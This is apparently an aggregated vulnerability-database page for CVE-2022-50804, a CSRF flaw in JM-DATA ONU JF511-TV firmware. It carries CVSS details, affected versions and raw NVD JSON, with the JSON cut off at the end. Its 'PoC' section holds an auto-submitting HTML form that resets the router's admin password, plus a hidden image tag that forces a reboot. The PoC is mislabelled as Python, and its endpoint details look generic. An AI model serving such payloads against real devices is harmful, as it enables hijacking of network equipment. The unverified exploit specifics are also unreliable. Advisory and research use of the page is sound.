Security Vulnerability Report
中文
CVE-2022-50804 CVSS 8.8 HIGH

CVE-2022-50804

Published: 2025-12-30 23:15:48
Last Modified: 2026-01-16 19:16:12

Description

JM-DATA ONU JF511-TV version 1.0.67 is vulnerable to cross-site request forgery (CSRF) attacks, allowing attackers to perform administrative actions on behalf of authenticated users without their knowledge or consent.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:jm-data:onu_jf511-tv_firmware:1.0.55:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:jm-data:onu_jf511-tv_firmware:1.0.62:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:jm-data:onu_jf511-tv_firmware:1.0.67:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:jm-data:onu_jf511-tv:-:*:*:*:*:*:*:* - NOT VULNERABLE
JM-DATA ONU JF511-TV firmware < 1.0.67

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2022-50804 JM-DATA ONU JF511-TV --> <!-- This PoC demonstrates modifying admin password via CSRF attack --> <html> <body> <h1>CVE-2022-50804 CSRF Attack PoC</h1> <p>Target: JM-DATA ONU JF511-TV (Firmware 1.0.67)</p> <form id="csrfForm" action="http://<target_ip>/cgi-bin/admin.cgi" method="POST" enctype="text/plain"> <input type="hidden" name="action" value="set_admin_password" /> <input type="hidden" name="new_password" value="hacker123" /> <input type="hidden" name="confirm_password" value="hacker123" /> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); </script> <p>If you see this message, the attack may have failed.</p> </body> </html> <!-- Alternative: Image tag-based attack (no user interaction required visually) --> <img src="http://<target_ip>/cgi-bin/admin.cgi?action=reboot" width="0" height="0" border="0">

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50804", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:47.987", "lastModified": "2026-01-16T19:16:12.483", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "JM-DATA ONU JF511-TV version 1.0.67 is vulnerable to cross-site request forgery (CSRF) attacks, allowing attackers to perform administrative actions on behalf of authenticated users without their knowledge or consent."}, {"lang": "es", "value": "JM-DATA ONU JF511-TV versión 1.0.67 es vulnerable a ataques de falsificación de petición en sitios cruzados (CSRF), permitiendo a los atacantes realizar acciones administrativas en nombre de usuarios autenticados sin su conocimiento o consentimiento."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:jm-data:onu_jf511-tv_firmware:1.0.55:*:*:*:*:*:*:*", "matchCriteriaId": "F1C9974C-0097-4D7B-9E0C-4CA65E456B4D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:jm-data:onu_jf511-tv_firmware:1.0.62:*:*:*:*:*:*:*", "matchCriteriaId": "D75FE915-886A-40F5-9C24-B79F5877D648"}, {"vulnerable": true, "criteria": "cpe:2.3:o:jm-data:onu_jf511-tv_firmware:1.0.67:*:*:*:*:*:*:*", "matchCriteriaId": "DE9BD2EC-CA99-4311-A376-A43909ADC33B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:jm-data:onu_jf511-tv:-:*:*:*:*:*:*:*", "matchCriteriaId": "B67A343D-EC91-49F3-B1C7-0BF3957862CB"}]}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2022060058", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/229355", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://packetstormsecurity.com/files/167487/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.jm-data.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/jm-data-onu-jf-tv-cross-site-request-forgery-csrf-vulnerability", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5708.php", "source": "[email protected]", "tags": ["Thir ... (truncated)